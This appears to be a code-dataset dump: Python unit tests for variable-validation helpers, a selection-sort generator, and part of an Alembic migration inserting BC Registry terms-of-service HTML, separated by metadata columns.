assert not self.util_var['test_mod'].variable_boolean(a_file)
def test_variable_boolean_with_unexistent_url(self):
an_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_boolean(an_url)
def test_variable_boolean_with_existent_url(self):
an_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_boolean(an_url)
def test_variable_boolean_with_true(self):
assert self.util_var['test_mod'].variable_boolean('true')
def test_variable_boolean_with_false(self):
assert self.util_var['test_mod'].variable_boolean('false')
def test_variable_boolean_with_True(self):
assert self.util_var['test_mod'].variable_boolean(True)
def test_variable_boolean_with_False(self):
assert self.util_var['test_mod'].variable_boolean(False)
def test_variable_boolean_with_yes(self):
assert self.util_var['test_mod'].variable_boolean('yes')
def test_variable_boolean_with_no(self):
assert self.util_var['test_mod'].variable_boolean('no')
# variable_boolean_true.
def test_variable_boolean_true_with_none(self):
assert not self.util_var['test_mod'].variable_boolean_true(None)
def test_variable_boolean_true_with_none_string(self):
assert not self.util_var['test_mod'].variable_boolean_true('None')
def test_variable_boolean_true_with_null_string(self):
assert not self.util_var['test_mod'].variable_boolean_true('null')
def test_variable_boolean_true__with_empty(self):
assert not self.util_var['test_mod'].variable_boolean_true('')
def test_variable_boolean_true_with_undefined_string(self):
text = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_boolean_true(text)
def test_variable_boolean_true_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_boolean_true('{{')
def test_variable_boolean_true_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_boolean_true('{}')
assert not self.util_var['test_mod'].variable_boolean_true('[]')
def test_variable_boolean_true_with_non_empty(self):
assert not self.util_var['test_mod'].variable_boolean_true('hello')
def test_variable_boolean_true_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_boolean_true(test_dict)
assert not self.util_var['test_mod'].variable_boolean_true(test_list)
def test_variable_boolean_true_with_unexistent_path(self):
a_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_boolean_true(a_file)
def test_variable_boolean_true_with_existent_path(self):
a_file = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_boolean_true(a_file)
def test_variable_boolean_true_with_unexistent_url(self):
an_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_boolean_true(an_url)
def test_variable_boolean_true_with_existent_url(self):
an_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_boolean_true(an_url)
def test_variable_boolean_true_with_true(self):
assert self.util_var['test_mod'].variable_boolean_true('true')
def test_variable_boolean_true_with_false(self):
assert not self.util_var['test_mod'].variable_boolean_true('false')
def test_variable_boolean_true_with_True(self):
assert self.util_var['test_mod'].variable_boolean_true(True)
def test_variable_boolean_true_with_False(self):
assert not self.util_var['test_mod'].variable_boolean_true(False)
def test_variable_boolean_true_with_yes(self):
assert self.util_var['test_mod'].variable_boolean_true('yes')
def test_variable_boolean_true_with_no(self):
assert not self.util_var['test_mod'].variable_boolean_true('no')
# variable_collection.
def test_variable_collection_with_none(self):
assert not self.util_var['test_mod'].variable_collection(None)
def test_variable_collection_with_none_string(self):
assert not self.util_var['test_mod'].variable_collection('None')
def test_variable_collection_with_null_string(self):
assert not self.util_var['test_mod'].variable_collection('null')
def test_variable_collection__with_empty(self):
assert not self.util_var['test_mod'].variable_collection('')
def test_variable_collection_with_undefined_string(self):
text = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_collection(text)
def test_variable_collection_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_collection('{{')
def test_variable_collection_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_collection('{}')
assert not self.util_var['test_mod'].variable_collection('[]')
def test_variable_collection_with_non_empty(self):
assert not self.util_var['test_mod'].variable_collection('hello')
def test_variable_collection_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert self.util_var['test_mod'].variable_collection(test_dict)
assert self.util_var['test_mod'].variable_collection(test_list)
def test_variable_collection_with_unexistent_path(self):
a_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_collection(a_file)
def test_variable_collection_with_existent_path(self):
a_file = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_collection(a_file)
def test_variable_collection_with_unexistent_url(self):
an_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_collection(an_url)
def test_variable_collection_with_existent_url(self):
an_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_collection(an_url)
# variable_empty.
def test_variable_empty_with_none(self):
assert self.util_var['test_mod'].variable_empty(None)
def test_variable_empty_with_none_string(self):
assert self.util_var['test_mod'].variable_empty('None')
def test_variable_empty_with_null_string(self):
assert self.util_var['test_mod'].variable_empty('null')
def test_variable_empty_with_empty(self):
assert self.util_var['test_mod'].variable_empty('')
def test_variable_empty_with_undefined_string(self):
test_str = self.util_var['undefined_str']
assert self.util_var['test_mod'].variable_empty(test_str)
def test_variable_empty_with_embedded_variable(self):
assert self.util_var['test_mod'].variable_empty('{{')
def test_variable_empty_with_empty_collection(self):
assert self.util_var['test_mod'].variable_empty('{}')
assert self.util_var['test_mod'].variable_empty('[]')
def test_variable_empty_with_non_empty(self):
assert not self.util_var['test_mod'].variable_empty('amanita')
def test_variable_empty_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_empty(test_dict)
assert not self.util_var['test_mod'].variable_empty(test_list)
def test_variable_empty_with_unexistent_path(self):
test_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_empty(test_file)
def test_variable_empty_with_existent_path(self):
test_file = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_empty(test_file)
def test_variable_empty_with_unexistent_url(self):
test_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_empty(test_url)
def test_variable_empty_with_existent_url(self):
test_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_empty(test_url)
# variable_path.
def test_variable_path_with_none(self):
assert not self.util_var['test_mod'].variable_path(None)
def test_variable_path_with_none_string(self):
assert not self.util_var['test_mod'].variable_path('None')
def test_variable_path_with_null_string(self):
assert not self.util_var['test_mod'].variable_path('null')
def test_variable_path_with_empty(self):
assert not self.util_var['test_mod'].variable_path('')
def test_variable_path_with_undefined_string(self):
test_str = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_path(test_str)
def test_variable_path_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_path('{{')
def test_variable_path_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_path('{}')
assert not self.util_var['test_mod'].variable_path('[]')
def test_variable_path_with_non_empty(self):
assert not self.util_var['test_mod'].variable_path('amanita')
def test_variable_path_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_path(test_dict)
assert not self.util_var['test_mod'].variable_path(test_list)
def test_variable_path_with_unexistent_path(self):
test_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_path(test_file)
def test_variable_path_with_existent_path(self):
test_file = self.util_var['existent_file']
assert self.util_var['test_mod'].variable_path(test_file)
def test_variable_path_with_unexistent_url(self):
test_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_path(test_url)
def test_variable_path_with_existent_url(self):
test_url = self.util_var['existent_url']
assert not self.util_var['test_mod'].variable_path(test_url)
# variable_url.
def test_variable_url_with_none(self):
assert not self.util_var['test_mod'].variable_url(None)
def test_variable_url_with_none_string(self):
assert not self.util_var['test_mod'].variable_url('None')
def test_variable_url_with_null_string(self):
assert not self.util_var['test_mod'].variable_url('null')
def test_variable_url_with_empty(self):
assert not self.util_var['test_mod'].variable_url('')
def test_variable_url_with_undefined_string(self):
test_str = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_url(test_str)
def test_variable_url_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_url('{{')
def test_variable_url_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_url('{}')
assert not self.util_var['test_mod'].variable_url('[]')
def test_variable_url_with_non_empty(self):
assert not self.util_var['test_mod'].variable_url('amanita')
def test_variable_url_with_non_empty_collection(self):
test_dict = self.util_var['test_dict']
test_list = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_url(test_dict)
assert not self.util_var['test_mod'].variable_url(test_list)
def test_variable_url_with_unexistent_path(self):
test_file = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_url(test_file)
def test_variable_url_with_existent_path(self):
test_file = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_url(test_file)
def test_variable_url_with_unexistent_url(self):
test_url = self.util_var['unexistent_url']
assert self.util_var['test_mod'].variable_url(test_url)
def test_variable_url_with_existent_url(self):
test_url = self.util_var['existent_url']
assert self.util_var['test_mod'].variable_url(test_url)
# variable_url_existent.
def test_variable_url_existent_with_none(self):
assert not self.util_var['test_mod'].variable_url_existent(None)
def test_variable_url_existent_with_none_string(self):
nostr = 'None'
assert not self.util_var['test_mod'].variable_url_existent(nostr)
def test_variable_url_existent_with_null_string(self):
nulst = 'null'
assert not self.util_var['test_mod'].variable_url_existent(nulst)
def test_variable_url_existent_with_empty(self):
assert not self.util_var['test_mod'].variable_url_existent('')
def test_variable_url_existent_with_undefined_string(self):
a_str = self.util_var['undefined_str']
assert not self.util_var['test_mod'].variable_url_existent(a_str)
def test_variable_url_existent_with_embedded_variable(self):
assert not self.util_var['test_mod'].variable_url_existent('{{')
def test_variable_url_existent_with_empty_collection(self):
assert not self.util_var['test_mod'].variable_url_existent('{}')
assert not self.util_var['test_mod'].variable_url_existent('[]')
def test_variable_url_existent_with_non_empty(self):
assert not self.util_var['test_mod'].variable_path('amanita')
def test_variable_url_existent_with_non_empty_collection(self):
adict = self.util_var['test_dict']
alist = self.util_var['test_list']
assert not self.util_var['test_mod'].variable_url_existent(adict)
assert not self.util_var['test_mod'].variable_url_existent(alist)
def test_variable_url_existent_with_unexistent_path(self):
afile = self.util_var['unexistent_file']
assert not self.util_var['test_mod'].variable_url_existent(afile)
def test_variable_url_existent_with_existent_path(self):
afile = self.util_var['existent_file']
assert not self.util_var['test_mod'].variable_url_existent(afile)
def test_variable_url_existent_with_unexistent_url(self):
a_url = self.util_var['unexistent_url']
assert not self.util_var['test_mod'].variable_url_existent(a_url)
def test_variable_url_existent_with_existent_url(self):
test_url = self.util_var['existent_url']
assert self.util_var['test_mod'].variable_url_existent(test_url)
| 42.589372
| 77
| 0.73843
| 2,544
| 17,632
| 4.661164
| 0.024371
| 0.115365
| 0.158627
| 0.172036
| 0.966773
| 0.934475
| 0.883792
| 0.838253
| 0.830494
| 0.807303
| 0
| 0
| 0.158972
| 17,632
| 413
| 78
| 42.692494
| 0.799649
| 0.011343
| 0
| 0.235495
| 0
| 0
| 0.108547
| 0.002411
| 0
| 0
| 0
| 0
| 0.440273
| 1
| 0.368601
| false
| 0
| 0.006826
| 0
| 0.37884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2e4e709b5811c3c0121b119d53102dbaa3c99d03
| 1,559
|
py
|
Python
|
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | null | null | null |
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | 4
|
2021-06-08T22:35:38.000Z
|
2022-03-12T00:50:00.000Z
|
src/algorithmsv2/doubleselectionsort.py
|
BozeBro/SortingVisualizer
|
5d85b436a0e779247ecc2ed7e1e538c67fc314c6
|
[
"MIT"
] | null | null | null |
def double_selection_sort(array):
bot = 0
top = len(array) - 1
while(bot < top):
small = big = array[bot]
small_ind = big_ind = bot
for i in range(bot, top + 1):
val = array[i]
if val > big:
big = val
big_ind = i
elif val < small:
small = val
small_ind = i
yield i, i
array[bot], array[small_ind] = array[small_ind], array[bot]
yield bot, small_ind
if (array[small_ind] == big):
array[top], array[small_ind] = array[small_ind], array[top]
yield top, small_ind
else:
array[top], array[big_ind] = array[big_ind], array[top]
yield top, big_ind
bot += 1
top -= 1
return array
def test_double_selection_sort(array):
bot = 0
top = len(array) - 1
while(bot < top):
small = big = array[bot]
small_ind = big_ind = bot
for i in range(bot, top + 1):
val = array[i]
if val > big:
big = val
big_ind = i
elif val < small:
small = val
small_ind = i
array[bot], array[small_ind] = array[small_ind], array[bot]
if (array[small_ind] == big):
array[top], array[small_ind] = array[small_ind], array[top]
else:
array[top], array[big_ind] = array[big_ind], array[top]
bot += 1
top -= 1
return array
| 29.415094
| 71
| 0.475305
| 198
| 1,559
| 3.590909
| 0.126263
| 0.180028
| 0.182841
| 0.202532
| 0.935302
| 0.912799
| 0.859353
| 0.859353
| 0.859353
| 0.859353
| 0
| 0.011074
| 0.420783
| 1,559
| 52
| 72
| 29.980769
| 0.776301
| 0
| 0
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0
| 0
| 0.083333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
cf036736e9ee83d60b79be6bc6a261d5a97a9ed4
| 85,138
|
py
|
Python
|
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | null | null | null |
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | null | null | null |
auth-api/migrations/versions/c10f494d7e10_add_tos_verion_4.py
|
argush3/sbc-auth
|
96a4de3a4358b3158540aea8c4d99e06909793f2
|
[
"Apache-2.0"
] | 1
|
2019-07-25T18:20:41.000Z
|
2019-07-25T18:20:41.000Z
|
"""add tos verion 4
Revision ID: c10f494d7e10
Revises: aaa29018c0a1
Create Date: 2020-12-24 11:04:39.997395
"""
import sqlalchemy as sa
from alembic import op
from sqlalchemy.sql import column, table
from sqlalchemy import Integer, String
# revision identifiers, used by Alembic.
revision = 'c10f494d7e10'
down_revision = 'aaa29018c0a1'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
documents = table('documents',
column('version_id', String),
column('type', String),
column('content_type', String),
column('content', String))
html_content = """
<section>
<p>The parties to this “BC Registry Terms and Conditions of Agreement” (the “Agreement”) are Her Majesty the Queen in Right of the Province of British Columbia, as represented by the Minister of Citizens’ Services (the “Province”) and the Subscriber (as defined below).</p>
</section>
<section>
<header>1. Definitions</header>
<ul>
<li><span>a.</span><strong>"Access"</strong> means the non-exclusive right to electronically access and use the Service;</li>
<li><span>b.</span><strong>"Additional Terms"</strong> means, as applicable to the Subscriber’s use of the Service, any of the BC Online Terms and Conditions, the API Terms, the BC Services Card Terms, the BCeID Terms, the PAD Agreement, or any combination of the foregoing;</li>
<li><span>c.</span><strong>"Basic Account Subscriber"</strong> means a Subscriber with Access for up to ten Transactions per month paying Fees for Transactions using a credit card or online banking;</li>
<li><span>d.</span><strong>"BCeID Information"</strong> means a BCeID account user ID or password, which authenticates the identity of the Subscriber or a Team Member, as the case may be, to the Service if the Subscriber or a Team Member uses a BCeID for this purpose;</li>
<li><span>e.</span><strong>"Commencement Date"</strong> means the date on which the Subscriber accepts the terms of this Agreement as part of the application process for Access;</li>
<li><span>f.</span><strong>"Content"</strong> means the Service’s Data Bases, and all associated information and documentation, including any print copy or electronic display of any information retrieved from the Data Base and associated with the Service;</li>
<li><span>g.</span><strong>"Data Base"</strong> means any data base or information stored in electronic format for which Access is made available through the Service;</li>
<li><span>h.</span><strong>"Deposit Account"</strong> has the meaning given to it in the BC Online Terms and Conditions;</li>
<li><span>i.</span><strong>"Entity"</strong> means any legal entity (including a registered society, business, or co-operative) for which certain Subscribers and Team Members may have Access through the Service;</li>
<li><span>j.</span><strong>"Fees"</strong> means all fees and charges for the Service, as described on the Website[LVAA1][MOU2], and includes without limitation, any expenses or charges incurred for Transactions, including any applicable Service Fee described in section 8.7 of this Agreement;</li>
<li><span>k.</span><strong>"Incorporation Number"</strong> means the unique numerical identifier for a Subscriber’s Entity, and when entered in conjunction with the Passcode, permits a Team Member to perform transactions with regard to that Entity;</li>
<li><span>l.</span><strong>“PAD Agreement”</strong> means the agreement referenced in section 8.4;</li>
<li><span>m.</span><strong>"Passcode"</strong> means the unique identifier issued by the Province to a Subscriber with regard to existing Entities on the Service, which enables a Team Member to have Access with regard to those Entities;</li>
<li><span>n.</span><strong>"Premium Account Subscriber"</strong> means a Subscriber with Access to unlimited Transactions that has either a Deposit Account with the Province and is charged Fees in accordance with the BC Online Terms and Conditions or has entered into a PAD Agreement and is charged Fees in accordance with that agreement;</li>
<li><span>o.</span><strong>"Service"</strong> means all products and services available through BC Registries that may be utilized by Subscriber or any of its Team Members and includes Access, Transactions and the API;</li>
<li><span>p.</span><strong>"Services Card Number"</strong> means the Subscriber’s BC Services Card number, which authenticates the identity of the Subscriber, or a Team Member, as the case may be, to the Service if the Subscriber or a Team Member uses a BC Services Card for this purpose;</li>
<li><span>q.</span><strong>"Subscriber"</strong> means a person that accesses the Service and that has accepted the terms of this Agreement, and includes Premium Account Subscribers and Basic Account Subscribers;</li>
<li><span>r.</span><strong>"Team Member"</strong> means an individual that is granted Access on the individual’s behalf, if the individual is also the Subscriber, or on behalf of the Subscriber, if the individual is an employee or is otherwise authorized to act on behalf of the Subscriber, as applicable;</li>
<li><span>s.</span><strong>"Transaction"</strong> means any action performed by the Subscriber or any of its Team Members to the Service to display, print, transfer, or obtain a copy of information contained on the Service, or where permitted by the Province, to add to or delete information from the Service; and</li>
<li><span>t.</span><strong>"Website"</strong> means the BC Registry Website at https://www.bcregistry.ca/business/auth/home/decide-business and includes all web pages and associated materials, with the exception of the Content.</li>
</ul>
</section>
<section>
<header>2. Acceptance of Agreement</header>
<ul>
<li><span>2.1</span>The Subscriber acknowledges that a duly authorized representative of the Subscriber has accepted the terms of this Agreement on behalf of the Subscriber and its Team Members.</li>
<li><span>2.2</span>The Subscriber acknowledges and agrees that:</li>
<li>
<ul>
<li><span>(a)</span>by creating a profile and/or by clicking the button acknowledging acceptance of this Agreement, each Team Member using the Services on behalf of the Subscriber also accepts, and will be conclusively deemed to have accepted, the terms of this Agreement as they pertain to the Team Member’s use of the Services;</li>
<li><span>(b)</span>the Additional Terms are incorporated herein by reference and also govern and apply to the Subscriber and to each Team Member’s use of the Service; and</li>
<li><span>(c)</span>the Subscriber will be solely responsible for its Team Members’ use of the Services, including without limitation any Fees incurred by its Team Members in connection with such Services.</li>
</ul>
</li>
<li><span>2.3</span>The Province reserves the right to make changes to the terms of this Agreement at any time without direct notice to either the Subscriber or its Team Members, as applicable. The Subscriber acknowledges and agrees that it is the sole responsibility of the Subscriber to review, and, as applicable, to ensure that its Team Members review, the terms of this Agreement on a regular basis.</li>
<li><span>2.4</span>Following the date of any such changes, the Subscriber will be conclusively deemed to have accepted any such changes on its own behalf and on behalf of its Team Members, as applicable. The Subscriber acknowledges and agrees that each of its Team Members must also accept any such changes as they pertain to the Team Member’s use of the Services.</li>
</ul>
</section>
<section>
<header>3. Authentication</header>
<ul>
<li><span>3.1</span>If a Subscriber or a Team Member has used the BC Services Card to authenticate in setting up an account to use the Service, the terms found at <a href="https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use" target="_blank">https://www2.gov.bc.ca/gov/content/governments/government-id/bc-services-card/log-in-with-card/terms-of-use</a> (the “BC Services Card Terms”) continue to apply in respect of use of the BC Services Card.</li>
<li><span>3.2</span>If the Subscriber or a Team Member has used a BCeID to authenticate in setting up an account to use the Service, the BCeID terms found at <a href="https://www.bceid.ca/aboutbceid/agreements.aspx" target="_blank">https://www.bceid.ca/aboutbceid/agreements.aspx</a> (the “BCeID Terms”) continue to apply in respect of the type of BCEID used.</li>
</ul>
</section>
<section>
<header>4. Proprietary Rights</header>
<ul>
<li><span>4.1</span>The Website and the Content is owned by the Province and/or its licensors and is protected by copyright, trademark and other laws. Except as expressly permitted in this Agreement, the Subscriber may not use, reproduce, modify or distribute, or allow any other person to use, reproduce, modify or distribute, any part of the Website in any form whatsoever without the prior written consent of the Province.</li>
</ul>
</section>
<section>
<header>5. Services</header>
<ul>
<li><span>5.1</span>The Province will provide the Subscriber and its Team Members with Access on the terms and conditions set out in this Agreement.</li>
<li><span>5.2</span>Subject to section 5.3, Access will be available during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>5.3</span>The Province reserves the right to limit or withdraw Access at any time in order to perform maintenance of the Service or in the event that the integrity or security of the Service is compromised.</li>
<li><span>5.4</span>The Province further reserves the right to discontinue the Service at any time.</li>
<li><span>5.5</span>The Province will provide helpdesk support to assist Team Members with Access during the hours published on the Website, as may be determined by the Province in its sole discretion from time to time.</li>
<li><span>5.6</span>The Subscriber acknowledges and agrees that, for the purpose of Access:</li>
<li>
<ul>
<li><span>(a)</span>it is the Subscriber’s sole responsibility, at the Subscriber’s own expense, to provide, operate and maintain computer hardware and communications software or web browser software that is compatible with the Services; and</li>
<li><span>(b)</span>any failure to do so may impact the Subscriber’s and/or Team Member’s ability to access the Service.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>6. API</header>
<ul>
<li><span>6.1</span>Premium Account Subscribers who wish to access the Content through an API will be subject to the API Terms of Use, including the requirement to contact the Province for an API key and access to the API interface.</li>
</ul>
</section>
<section>
<header>7. Subscriber Obligations</header>
<ul>
<li><span>7.1</span>The Subscriber will comply, and will ensure that all of its Team Members are aware of and will comply, with:</li>
<li>
<ul>
<li><span>(a)</span>the terms of this Agreement, including the requirements regarding the integrity and/or security of the Service set out in this Article 7; and
<li><span>(b)</span>all applicable laws, in connection with the Subscriber’s and/or Team Members’ use of the Services.</li>
</ul>
</li>
<li><span>7.2</span>The Subscriber will ensure that each Team Member:</li>
<li>
<ul>
<li><span>(a)</span>is duly authorized by the Subscriber to perform any Transaction and utilize the Service on behalf of the Subscriber;</li>
<li><span>(b)</span>maintains in confidence Services Card Numbers, BCeID Information, Incorporation Numbers and Passcodes;</li>
<li><span>(c)</span>is competent to perform a Transaction and utilize the Service;</li>
<li><span>(d)</span>has been adequately trained and instructed to perform a Transaction and utilize the Service; and</li>
<li><span>(e)</span>does not use the Service for any inappropriate or unlawful purpose.</li>
</ul>
</li>
<li><span>7.3</span>The Subscriber will not, and will ensure that its Team Members do not, take any action that would compromise the integrity and/or security of the Service or any Content.</li>
<li><span>7.4</span>Without limiting the general nature of the foregoing section, the Subscriber will not, and will ensure that its Team Members do not:</li>
<li>
<ul>
<li><span>(a)</span>use the Service or any Content for activities or for a purpose different from those for which Access was granted including without limitation any unlawful activities or purpose;</li>
<li><span>(b)</span>attempt to circumvent or subvert any security measures;</li>
<li><span>(c)</span>take any action or use any program that impedes, restricts, limits or otherwise jeopardizes the operation and/or availability of the Service or any Content;</li>
<li><span>(d)</span>take any action that might reasonably be construed as likely to adversely affect any other Subscriber, or Team Member;</li>
<li><span>(e)</span>alter or delete any information in any Data Base unless explicitly authorized to do so by the Province;</li>
<li><span>(f)</span>alter in any way whatsoever a printout or display of any information retrieved from any Data Base unless explicitly authorized to do so by the Province; or</li>
<li><span>(g)</span>use, reproduce or distribute any altered information, including any printout or display of altered information, or represent any altered information as having been retrieved from any Data Base unless explicitly authorized to do so by the Province.</li>
</ul>
</li>
<li><span>7.5</span> The Subscriber will adhere, and will ensure that each of its Team Members adhere, to any applicable security policies, standards or procedures in respect of a particular Data Base that may be provided to the Subscriber and/or its Team Members by the Province from time to time.</li>
</ul>
</section>
<section>
<header>8. Fees</header>
<ul>
<li><span>8.1</span>The Subscriber will pay to the Province all applicable Fees for the Services.</li>
<li><span>8.2</span>Subject to section 8.5, all Fees are due and payable when a Transaction is processed.</li>
<li><span>8.3</span>If a Premium Account Subcriber opts to pay Fees through a Deposit Account, the Fees payable for Transactions will be charged to the applicable Deposit Account and in accordance with the BC Online Terms and Conditions found at <a href="https://www.bconline.gov.bc.ca/terms_conditions.html" target="_blank">(https://www.bconline.gov.bc.ca/terms_conditions.html)</a> (the “BC Online Terms”).</li>
<li><span>8.4</span>If a Premium Account Subscriber opts to pay Fees through pre-authorized debit, the Fees payable for Transactions will be paid according to the PAD Agreement found at <a href="./PAD-terms-and-conditions" target="_blank">(https://www.bcregistry.ca/business/auth/PAD-terms-and-conditions)</a> (the Business Pre-Authorized Debit Terms and Conditions Agreement).</li>
<li><span>8.5</span>Fees payable for Transactions processed by Basic Account Subscribers will be payable by credit card or online banking before the Transaction is processed.</li>
<li><span>8.6</span>Unless otherwise specified in this Agreement, all references to money in respect of the Services are to Canadian dollars and all Fees will be processed in Canadian dollars.</li>
<li><span>8.7</span>The Province may charge the Subscriber a service fee of thirty dollars ($30.00) if any method of payment of any Fees is rejected by the Subscriber’s financial institution for any failed payment, and may suspend Access until such service fee and all other Fees owing have been paid by the Subscriber.</li>
<li><span>8.8</span>Unless otherwise specified in any Additional Terms, any refund or credit for any Transactions or other Services is at the sole discretion of the Province.</li>
<li><span>8.9</span>The Province, by electronic or other means, will provide to the Premium Subscriber, at regular intervals to be determined by the Subscriber from options provided to the Subscriber by the Province, a statement that contains: (a) an itemized list of Transactions and (b) the total Fees for those Transactions.</li>
<li><span>8.10</span>If a Subcriber has a BC Online account and wishes to receive a statement containing consolidated accounting of Transactions made in BC Online and the new BC Registry System, the Subscriber must link both accounts.</li>
<li><span>8.11</span>Unless otherwise specified in any Additional Terms, if a Subscriber does not notify the Province in writing of any errors in or objections to any Fees identified in the Statement within ninety (90) days of the date of the applicable invoice, the Fees set out in the invoice will be conclusively deemed to have been accepted as correct by the Subscriber and no claim for adjustment or set-off will be accepted.</li>
</ul>
</section>
<section>
<header>9. Relationship</header>
<ul>
<li><span>9.1</span>This Agreement will not in any way make the Subscriber or any Team Member an employee, agent or independent contractor of the Province and the Subscriber will not, and will ensure that its Team Members do not, in any way indicate or hold out to any person that the Subscriber or any Team Member is an employee, agent or independent contractor of the Province.</li>
</ul>
</section>
<section>
<header>10. Suspension of Service</header>
<ul>
<li><span>10.1</span>The Province may, in its sole discretion, immediately suspend Access upon notice to the Subscriber in accordance with section 13 if:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber or any of its Team Members has, in the reasonable opinion of the Province, in any way jeopardized the integrity or security of the Service;</li>
<li><span>(b)</span>the Subscriber fails to pay Fees in accordance with section 8.2 or 8.5, as applicable; or</li>
<li><span>(c)</span>the Subscriber or any of its Team Members has violated any other provision of this Agreement.</li>
</ul>
</li>
</ul>
</section>
<section>
<header>11. Termination</header>
<ul>
<li><span>11.1</span>The term of this Agreement will be from the Commencement Date and will continue until terminated in accordance with the provisions of this Agreement.</li>
<li><span>11.2</span>The Province may immediately terminate this Agreement upon written notice to the Subscriber if the Subscriber’s Access has been suspended pursuant to Article 10.1.</li>
<li><span>11.3</span>This Agreement may be terminated by either party for any reason upon providing sixty (60) days written notice to the other party.</li>
<li><span>11.4</span>Upon termination:</li>
<li>
<ul>
<li><span>(a)</span>the Subscriber will immediately cease, and will ensure that all of its Team Members immediately cease, all use on the Subscriber’s behalf of the Service and all Passcodes; and</li>
<li><span>(b)</span>Premium Account Subscribers will pay to the Province all unpaid Fees incurred by the Subscriber up to the date of termination.</li>
</ul>
</li>
<li><span>11.5</span>In the event that a Subscriber’s Agreement is terminated, the Province reserves the right to refuse future Access to that Subscriber or to downgrade a Premium Account Subscriber to a Basic Account Subscriber, in which case the Subscriber acknowledges and agrees that it is only entitled to Access up to ten Transactions per month.</li>
</ul>
</section>
<section>
<header>12. Warranty Disclaimer, Limitation of Liability and Indemnity</header>
<ul>
<li><span>12.1</span>THE SUBSCRIBER ACKNOWLEDGES AND CONFIRMS THAT THE SUBSCRIBER UNDERSTANDS THAT THIS ARTICLE 12 REQUIRES THE SUBSCRIBER TO ASSUME THE FULL RISK IN RESPECT OF ANY USE OF THE SERVICES BY THE SUBSCRIBER AND/OR ITS TEAM MEMBERS.</li>
<li><span>12.2</span>Except as expressly set out in this Agreement, and in addition to the Province’s general Warranty Disclaimer and Limitation of Liabilities, the Province assumes no responsibility or liability to any person using the Service or any Content. In particular, without limiting the general nature of the foregoing:</li>
<li>
<ul>
<li><span>(a)</span>in no event will the Province, its respective servants, agents, contractors or employees be liable for any direct, indirect, special or consequential damages or other loss, claim or injury, whether foreseeable or unforeseeable (including without limitation claims for damages for personal injury, lost profits, lost savings or business opportunities) arising out of or in any way connected with the use of, or inability to use the Service or any Content;</li>
<li><span>(b)</span>the entire risk as to the quality and performance of the Service or any Content is assumed by the Subscriber;</li>
<li><span>(c)</span>the Service and all Content are provided “as is”, and the Province disclaims all representations, warranties, conditions, obligations and liabilities of any kind, whether express or implied, in relation to the Service or any Content, including without limitation implied warranties with respect to merchantability, fitness for a particular purpose, error-free or uninterrupted use and non-infringement; and</li>
